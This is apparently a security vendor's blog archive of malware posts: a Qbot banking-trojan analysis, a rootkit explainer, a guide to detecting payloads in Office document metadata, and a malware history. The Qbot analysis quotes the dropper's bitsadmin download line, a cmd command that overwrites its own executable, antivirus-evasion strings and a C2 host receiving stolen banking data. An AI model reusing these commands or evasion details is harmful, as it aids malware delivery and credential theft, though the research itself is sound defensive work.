Tag Archives: malware

Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thou...

Varonis Exposes Global Cyber Campaign: C2 Server Actively Compromising Thousands of Victims

The Varonis Security Research team discovered a global cyber attack campaign leveraging a new strain of the Qbot banking malware. The campaign is actively targeting U.S. corporations but has hit networks worldwide—with victims throughout Europe, Asia, and South America—with a goal of stealing proprietary financial information, including bank account credentials.

During the analysis, we reversed this strain of Qbot and identified the attacker’s active command and control server, allowing us to determine the scale of the attack. Based on direct observation of the C2 server, thousands of victims around the globe are compromised and under active control by the attackers. Additional information uncovered from the C&C server exposed traces of the threat actors behind this campaign.

The attack was initially detected by Varonis DatAlert which alerted one of our North American customers of dropper activity, internal lateral movement, and suspicious network activity.

Our team has shared additional non-public information with the appropriate authorities and are performing responsible disclosure.

New Variant of Qbot Banking Malware

The threat actors used a new variant of Qbot, a well-known and sophisticated malware designed to steal banking credentials. Qbot employs anti-analysis techniques, frequently evades detection, and uses new infection vectors to stay ahead of defenders.

The malware is polymorphic, or constantly changing:

  • It creates files and folders with random names
  • Its dropper frequently changes C2 servers
  • The malware loader changes when there is an active internet connection (more on this later)

Qbot (or Qakbot) was first identified in 2009 and has evolved significantly. It is primarily designed for collecting browsing activity and data related to financial websites. Its worm-like capabilities allow it to spread across an organization’s network and infect other systems.

Discovery

Our forensics team began investigating after receiving a call from a customer, whose implementation of DatAlert had alerted them to unusual activity in their systems. Our team determined that at least one computer had been infected with malware and was attempting to propagate to additional systems on the network.

A sample was extracted and sent to our research team for analysis, who identified the malware as a variant of Qbot/Qakbot. The sample did not match any existing hashes, and further investigation revealed that this was a new strain.

Phase One – Dropper

File name: REQ_02132019b.doc.vbs

In previous versions of Qbot, the first launcher was a Word document macro. A zip file with a .doc.vbs extension was found during our investigation, indicating that the first infection was likely carried out via a phishing email that lured the victim into running the malicious VBS file.

Upon execution, the VBS extracts the OS version of the victim’s machine and attempts to detect common anti-virus software installed on the system.

AV strings the malware looks for include: Defender, Virus, Antivirus, Malw, Trend, Kaspersky, Kav, Mcafee, symantec

In this variant, the malware uses BITSAdmin to download the loader.  This appears to be a new behavior, as previous samples used PowerShell.

BITSAdmin downloads the loader from one of the following URLs:

Downloading the loader using BITSAdmin from the VBS code:

intReturn = wShell.Run(‘bitsadmin /transfer qahdejob’ & Second(Now) & ‘ /Priority HIGH ‘ & el & urlStr & ‘ ‘ & tempFile, 0, True)

Phase Two: Gain Persistency and Inject to explorer.exe

Filename: widgetcontrol.png

The loader, which executes the core malware, has multiple versions and is constantly updating even after execution. The version that the victim receives upon infection is dependent on the sp parameter that is hardcoded in the VBS file.

One interesting point is that each version of the loader is signed with a different digital certificate. Valid certificates usually indicate a file is trustworthy, while unsigned executables are suspicious.

Qbot is known to use fake or stolen, valid digital certificates to gain credibility and evade detection on the operating system.

We downloaded all the available versions of the loader (see IOCs below) and mapped the certificates.

Certificates used by the malware:

  • Saiitech Systems Limited
  • ECDJB Limited
  • Hitish Patel Consulting Ltd
  • Doorga Limited
  • INTENTEK LIMITED
  • Austek Consulting Limited
  • IO Pro Limited
  • Vercoe IT Ltd
  • Edsabame Consultants Ltd
  • SOVA CONSULTANCY LTD

Example of one of the certificates:

Persistence

When first run, the loader copies itself to %Appdata%\Roaming\{Randomized String} and then creates the following:

Injected Explorer.exe

The loader launches a 32-bit explorer.exe process and then injects the main payloads.

Here is the memory of explorer.exe with the injected payload as RWX memory segment:

Here is the memory of explorer.exe with the injected payload as RWX memory segment:

After the injection, the loader overwrites its original executable with the 32-bit version of calc.exe:

“C:\Windows\System32\cmd.exe” /c ping.exe -n 6 127.0.0.1 & type “C:\Windows\System32\calc.exe” > C:\Users\{TKTKTK}\Desktop\1.exe

Phase Three: Lateral Movement and Stealing Money

After establishing persistence, the main payloads begin to brute force accounts on the network.

If the malware compromises a domain account, it enumerates the “Domain Users” group and brute forces the accounts. If the compromised account is a local account, the malware uses a predefined list of local users instead.

Authentication attempts use NTLM, and the API WNetAddConnection.

We extracted the usernames and passwords the malware uses when attempting to brute force local accounts (found here). The malware hides these dictionaries from static analysis, but they can be extracted during runtime.

X32dbg image of explorer.exe trying to connect to a remote computer with the username “Administrator” and the password “12345678”:

Show Me the Money

The main goal of Qbot is to steal money from its victims; it uses several methods to send financial, credential and other information back to the attacker’s server:

  • Keylogging – Qbot captures and sends every keystroke that the victim enters and uploads them to the attacker.
  • Credentials/cookies – Qbot searches for saved credentials/cookies from browsers and sends them to the attacker.
  • Hooking – the main payload injects to all the processes in the system with a code that hooks API calls and searches for financial/banking string the malware extracts the data, credentials, or session cookies from the process and uploads it to the attacker.

The image shows that when authenticating to banking site buisnessline.huntington.com, the malware sends the POST data and the session cookies to the C2 server content.bigflimz.com:

Inside the Attacker’s C2 Server

On one of the attacker’s sites, we were able to find log files containing the victim IPs, operating system details, and anti-virus product names. The C2 server revealed past activities, as well as what appears to be additional malware versions (version table in the IOC section, below).

Some of the results may contain duplicates, but below are the top 10 countries, anti-virus products, and operating systems found. You can also find the full data set in our Github repository.

Victims by Country

We found 2,726 unique victim IP addresses. As many organizations use port address translation that masks internal IP addresses, the number of victims is likely much larger.

Victims by Anti-Virus Found

Victims by Operating System

IOCs

IOCs can be found on Github here.

Loader Versions

Full list found here.

What is a Rootkit? How Can You Detect it?

shadow of man walking behind glass walls

“Geez, my computer is really running slow all of a sudden.”

“Hmm, I don’t recall seeing this odd application in my task manager before.”

If you have ever asked these questions, there is a chance you caught a rootkit virus. One of the most infamous rootkits, Stuxnet, targeted the Iranian nuclear industry, infecting 200,000 computers and physically degraded 1,000 machines inside Iran’s uranium enrichment facilities.

What is a Rootkit?

Rootkits are the toolboxes of the malware world. They install themselves as part of some other download, backdoor, or worm. They then take steps to prevent the owner from detecting their presence on the system. Once installed, Rootkits provide a bad actor with everything they need to take control of your PC and use it for DDoS or as a zombie computer.

Rootkits operate near or within the kernel of the OS, which means they have low-level access to instructions to initiate commands to the computer. Hackers have recently updated rootkits to attack new targets, namely the new Internet of Things (IoT), to use as their zombie computers. Anything that uses an OS is a potential target for a rootkit – your new fridge or thermostat included.

Rootkits do provide functionality for both security and utility to end-users, employers, and law enforcement. Veriato is a rootkit that gives employers monitoring capabilities for their employees’ computers. Law enforcement agencies use rootkits for investigations on PCs and other devices. Rootkits are the bleeding edge of OS development, and research for rootkits helps developers counter possible future threats.

What is a Rootkit Scan?

white security camera on white wall

Rootkit scans are the best attempt to detect a rootkit infection, most likely initiated by your AV solution. The challenge you face when a rootkit infects our PC is that your OS can’t necessarily be trusted to identify the rootkit. They are pretty sneaky and good at camouflage. If you suspect a rootkit virus, one of the better strategies to detect the infection is to power down the computer and execute the scan from a known clean system.

Rootkit scans also look for signatures, similar to how they detect viruses. Hackers and security developers play this cat and mouse game to see who can figure out the new signatures faster. A surefire way to find a rootkit is with a memory dump analysis. You can always see the instructions a rootkit is executing in memory, and that is one place it can’t hide.

Behavioral analysis is one of the other more reliable methods of detecting rootkits. Instead of looking for the rootkit, you look for rootkit-like behaviors. Or in Varonis terms you apply Data Security Analytics to look for deviant patterns of behavior on your network. Targeted scans work well if you know the system is behaving oddly. Behavioral analysis will alert you of a rootkit before a human realizes one of the servers is under attack.

Rootkit Protection Best Practices

The good news is that rootkits as a method of cyberattack are in decline. OS developers and security researchers continue to improve operating systems and endpoint defenses to protect users from all types of malware, and their efforts have been especially effective against rootkits. Rootkits require high privilege access to install their hooks into the OS. Most systems prevent these kinds of attacks with built-in kernel protection modes. Many companies apply the principle of least privilege, which also prevents users from being able to install software to the kernel, thereby preventing rootkits from taking hold.

Behavior analysis is considered a best practice to defending your data against rootkit based attacks. Behavioral analysis will find evidence of a rootkit while a hacker is using the tools. They could trip a threat monitor by trying to access a folder the user account doesn’t normally access or when they try to promote their account to higher privilege levels. With a well-developed permissions policy based on principles of least privilege and data security analytics a hacker will have a difficult time stealing data with a rootkit.

Rootkits Over the Years

black and white canyon

Below are a few different rootkits for further research. The rootkits highlighted below are both significant in their development or impact.

Even though rootkits are largely no longer being developed to target personal computers, the new Internet of Things (IoT) is providing hackers a whole new set of systems to take over and use as zombie computers. I expect the IoT to see the same kind of security concerns as early computers experienced in the early 2000s. Which makes a monitoring solution that protects you from threats, like DatAlert, even more important. You also want to check out Varonis Edge to add further context to our threat prediction models. Varonis Edge gathers data from the Proxies, DNS, and Routers to better analyze the attack vectors that hackers use to get in your network.

Check out a demo of the Varonis Data Security Platform to see how DatAlert and Edge can defend you from rootkit and other threats!

Detecting Malware Payloads in Office Document Metadata

Office Documents with Malicious Metadata

Ever consider document properties like “Company,” “Title,” and “Comments” a vehicle for a malicious payload? Checkout this nifty PowerShell payload in the company metadata:

Here’s the full VirusTotal entry. The target opens the Office document and, with macros enabled, the payload stored within the document’s own metadata executes and does its work. No extra files written to disk or network requests made.

The question  about whether DatAlert can detect stuff like this came up in the Twitter thread, so I decided to write up a quick how-to.

Finding Malicious Metadata with Varonis

What you’ll need: DatAdvantage, Data Classification Framework, DatAlert

Step 1: Add Extended File Properties to be scanned by Data Classification Framework.

  • Open up the Varonis Management Console
  • Click on Configuration → Extended File properties
  • Add a new property for whichever field you’d like to scan (e.g., “Company”)

Varonis Management Console

(Note: prior to version 6.3, extended properties are created in DatAdvantage under Tools → DCF and DW → Configuration → Advanced)

Step 2: Define a malicious metadata classification rule

  • In the main menu of DatAdvantage select Tools → DCF and DW → Configuration
  • Create a new rule
  • Create a new filter
  • Select File properties → Company (or whichever property you’re scanning)
  • Select “like” to search for a substring
  • Add the malicious value you’d like to look for (e.g., .exe or .bat)

Varonis DCF New Classification Rule

Step 3: Create an alert in DatAlert to notify you whenever a file with malicious metadata is discovered

  • In the main menu of DatAdvantage select Tools → DatAlert
  • Click the green “+” button to create a new rule
  • Click on the “Where (Affected Object)” sub menu on the left
  • Add a new filter → Classification Results
  • Select your rule name (e.g., “Malicious Metadata”)
  • Select “Files with hits” and “Hit count (on selected rules)” greater than 0

DatAlert Rule for Malicious Document Metadata

You can fill out the rest of the details of your alert rule–like which systems to scan, how you want to get your alerts, etc.

As an extra precaution, you could also create a Data Transport Engine rule based on the same classification result that will automatically quarantine files that are found to have malicious metadata.

That’s it! You can update your “Malicious Metadata” over time as you see reports from malware researchers of new and stealthier ways to encode malicious bits within document metadata.

If you’re an existing Varonis customer, you can setup office hours with your assigned engineer to review your classification rules and alerts. Not yet a Varonis customer? What are you waiting for? Get a demo of our data security platform today.

Lessons from the Malware Museum

Lessons from the Malware Museum

If you haven’t already seen Mikko Hypponen’s collection of vintage malware at the Internet Archive, take the time for a brief tour. If you’re on a lunch hour, it’s also worthwhile to hear Mikko’s talk on how malware has evolved from its primitive roots.

Hunter-Gatherer Ware

The interesting point about these early viruses is that the hackers seemed to get an unhealthy pleasure in pranking anonymous users.  The hackers craved the idea of an 8-bit graphic crawling across your monitor (see Walker or Ambulance) or just displaying a large ‘V’ once a month (that would be the V-sign virus) or a cool fractal (Tequila).

More creative hackers had some really impressive graphics chops, considering the available technology: check out this Martian landscape. These early pioneers had style!

Unlike today’s malware, the attackers also put their personal stamp on their work: you were supposed to take notice.

In one of the first known viruses (see Brain), the attackers even left their street address in their DOS-based executable. Oops.

It was a more innocent time.

But even these earlier viruses had a destructive element. Take for example Casino, which asked victims to play a virtual game of slots. If your luck ran out, the disk was erased.

malware_Q-WALKER.COM

Vintage malware: Walker

In the pre-Internet and early-modem era, you’d share floppy disks with your friends and workers. The viruses were designed to replicate by infecting the boot sector of the diskette. As users, we all literally walked the virus to the next target — “sneaker-net”. Floppy-based Brain became a world-wide phenomenon.

Primitive, but effective.

Modern Malware

With the dawn of Microsoft Windows and Internet email — cue up 2001:A Space Odyssey theme music — viruses advanced into a more familiar form.

They began to embed themselves in Word or Excel documents using VBA scripts, so they were much harder to detect than the previous generation. They spread by secretly reading Outlook contacts and emailing themselves to the next victim.

Melissa and Code Red were classics of this worm genre.

Hackers also started to exploit people’s primeval urges to click on anything that’s sent to them in their emails, especially if it had a catchy subject line involving attractive female superstars — see the Anna Kournikova virus.

And around 2002-2003, came Fizzer. Its malware developers realized that people were using their laptops to store valuable information or enter it into web sites — passwords, credit card numbers. Fizzer secretly logged keystrokes and scanned documents, and used a backdoor to exfiltrate it to the attacker’s server.

Back to the Future

It’s 2016 and we’re still suckers when it comes to clicking on links or attachments found in our emails.

True, phishing attacks are much more targeted and can occasionally catch the best prepared of us off guard.

However, the techniques are ancient and at this point the digital equivalent of three-card monte. Far too many of us are still falling for Nigerian scams involving $100,000 and a wealthy oil trader named Mr. George Abdul.

With the rise of ransomware, the attackers are now back to boldly announcing their presence while encrypting files.

Will we ever get rid of malware? The answer is no: it’s really the Internet’s oldest profession, and it will be with us forever.

DatAdvantage is a modern answer to an age-old problem. Learn how it can protect your data from the inside out.